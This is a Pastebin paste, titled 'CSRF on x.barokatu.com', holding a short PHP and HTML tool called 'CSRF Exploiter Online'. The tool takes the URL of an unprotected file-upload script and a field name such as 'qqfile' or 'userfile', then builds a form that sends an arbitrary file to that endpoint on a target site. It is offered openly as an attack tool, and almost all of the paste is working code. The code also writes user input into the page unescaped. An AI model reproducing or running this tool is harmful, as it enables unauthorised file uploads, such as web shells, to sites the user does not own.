Advertisement
rizky21id

CSRF on x.barokatu.com

Sep 1st, 2019
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>CSRF Exploiter Online</title>
  4. </head>
  5. <meta name="author" content="barokatu.com" />
  6. <link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
  7. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  8. <link rel="stylesheet" type="text/css" href="assets/css/1.css">
  9. <body>
  10. <form method="post">
  11. URL: <input type="text" name="url" size="50" height="10" placeholder="http://127.0.0.1/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  12. POST File: <input type="text" name="data" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px;" required><br>
  13. <input type="submit" name="go" value="Lock Target">
  14. </form>
  15. <?php
  16. $url = $_POST['url'];
  17. $data = $_POST['data'];
  18. $submit = $_POST['go'];
  19. if($submit) {
  20. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input type='submit' name='ok' value='Upload'></form";
  21. }
  22. ?>
  23. </form>
  24.  
  25. <br>
  26. <a href="index.php">Back!</a>
  27. </body>
  28. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement